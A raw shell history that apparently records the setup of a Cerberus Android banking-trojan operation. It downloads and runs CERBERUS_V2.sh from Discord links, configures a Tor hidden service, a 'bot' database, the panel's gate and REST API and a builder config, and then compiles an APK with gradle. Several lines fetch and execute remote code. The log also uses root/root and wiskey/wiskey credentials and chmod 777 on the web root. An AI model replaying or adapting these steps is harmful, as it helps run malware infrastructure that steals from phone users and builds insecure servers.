    1  cd /home
    2  clear
    3  l
    4  wget https://cdn.discordapp.com/attachments/747099189317730384/892062301904052266/fixapk_sysbig.zip
    5  wget https://cdn.discordapp.com/attachments/747099189317730384/892056134268108890/real.sql
    6  wget https://cdn.discordapp.com/attachments/747099189317730384/892056106032070686/CERBERUS_V2.sh
    7  chmod 777 CERBERUS_V2.sh
    8  chown root:root CERBERUS_V2.sh
    9  ./CERBERUS_V2.sh
   10  lsb_release -a
   11  clear
   12  l
   13  unzip pack_sysres_control_sysbig.zip
   14  tar -xf f7OC2z2lI0VJhAVA_v4.tar
   15  rm -rf sysbig/
   16  unzip fixapk_sysbig.zip
   17  clear
   18  l
   19  rm -rf f7OC2z2lI0VJhAVA_v4.tar && rm -rf fixapk_sysbig.zip  && rm -rf pack_sysres_control_sysbig.zip
   20  clear
   21  l
   22  nano /etc/tor/torrc
   23  systemctl restart tor
   24  cat /var/lib/tor/cerberus/hostname
   25  nano /etc/nginx/sites-available/default
   26  nginx -s reload
   27  systemctl restart nginx
   28  systemctl restart tor
   29  nginx -s reload
   30  systemctl restart nginx
   31  systemctl restart tor
   32  mysql -uroot --password="root" -e "CREATE DATABASE bot /*\!40100 DEFAULT CHARACTER SET utf8 */;"
   33  mysql -uroot --password="root" -e "CREATE USER 'wiskey'@'localhost' IDENTIFIED BY 'wiskey';"
   34  mysql -uroot --password="root" bot < real.sql
   35  mysql -uroot --password="root" -e "GRANT ALL PRIVILEGES ON *.* TO 'wiskey'@'localhost';"
   36  mysql -uroot --password="root" -e "FLUSH PRIVILEGES;"
   37  curl -sL https://deb.nodesource.com/setup_11.x | sudo -E bash -
   38  curl -sL https://deb.nodesource.com/setup_14.x | sudo -E bash -
   39  sudo apt-get install -y nodejs
   40  nano tor/src/pages/BuilderConfig.jstor/src/pages/BuilderConfig.js
   41  nano tor/src/pages/BuilderConfig.js
   42  cd tor
   43  npm install
   44  npm audit fix --force
   45  npm update
   46  npm run build && rm -f -rf /var/www/tor && mkdir /var/www/tor && cp -R build/. /var/www/tor
   47  nano /var/www/tor/config.php
   48  nano /var/www/tor/config.json
   49  cd /home
   50  l
   51  cp -rf control/ /var/www/tor
   52  cp -rf sysbig/ /
   53  cp -rf sysres/ /
   54  clear
   55  l
   56  nano /var/www/tor/control/content/config.php
   57  cd /sysres/source/gate/
   58  l
   59  nano conf.php
   60  ls /var/www/tor
   61  nano conf.php
   62  cp * /var/www/html
   63  cd ..
   64  cd restapi/
   65  l
   66  nano db.php
   67  cp * /var/www/tor
   68  chown -R root:root /sysbig/
   69  chmod -R 777 /sysbig/
   70  chmod -R 777 /var/www/
   71  chown -R root:root /var/www/
   72  nginx -s reload
   73  systemctl restart nginx
   74  systemctl restart tor
   75  sudo apt-get install libc6-dev-i386 lib32z1 openjdk-8-jdk -y
   76  cd /home/ ; wget https://dl.google.com/android/repository/sdk-tools-linux-3859397.zip ; unzip sdk-tools-linux-3859397.zip
   77  export PATH=/home/tools:/home/tools/bin:$PATH
   78  update-alternatives --config java
   79  sudo apt-get install libc6-dev-i386 lib32z1 openjdk-8-jdk
   80  sudo apt install default-jdk
   81  sudo apt update && sudo apt install android-sdk
   82  update-alternatives --config java
   83  sudo apt install xfce4 xfce4-goodies xorg dbus-x11 x11-xserver-utils -y ; sudo apt install xrdp -y ; sudo adduser xrdp ssl-cert ; sudo systemctl restart xrdp ; sudo ufw allow from 192.168.1.0/24 to any port 3389 ; sudo ufw allow 3389
   84  apt install imagemagick-6.q16 -y
   85  cd /root
   86  l
   87  cd /home
   88  l
   89  cd tools/
   90  l
   91  sudo ./android update sdk --no-ui
   92  mkdir -p .android && touch ~/.android/repositories.cfg
   93  cd ..
   94  rm -rf to
   95  rm -rf tools/
   mkdir /opt/android-sdk-linux && export ANDROID_HOME=/opt/android-sdk-linux && sudo mkdir -p $ANDROID_HOME && cd $ANDROID_HOME && sudo wget https://dl.google.com/android/repository/tools_r25.2.3-linux.zip && sudo unzip tools_r25.2.3-linux.zip && cp -rf tools/ /home && cd /home/tools && sudo ./android update sdk --no-ui
  103  l
  104  sudo ./android update sdk --no-ui
  105  chown -R root:root /sysbig/
  106  chmod -R 777 /sysbig/
  107  chmod -R 777 /var/www/
  108  chown -R root:root /var/www/
  109  cd /sysbig/tmpfile/
  110  l
  111  cd S2lsCc5MzmsAb/
  112  l
  113  cd mmm
  114  l
  115  /home/tools/bin/sdkmanager 'platforms;android-27' --sdk_root=/home/Android/Sdk
  116  ./gradlew assembleRelease
  117  cd ..
    rm -rf S2lsCc5MzmsAb/
    sudo mkdir /sysbig/tmpfile/S2lsCc5MzmsAb
    sudo cp -r /sysbig/sourceproject/mmm /sysbig/tmpfile/S2lsCc5MzmsAb/mmm
    sudo chmod -R 777 /sysbig/tmpfile/S2lsCc5MzmsAb
  122  history

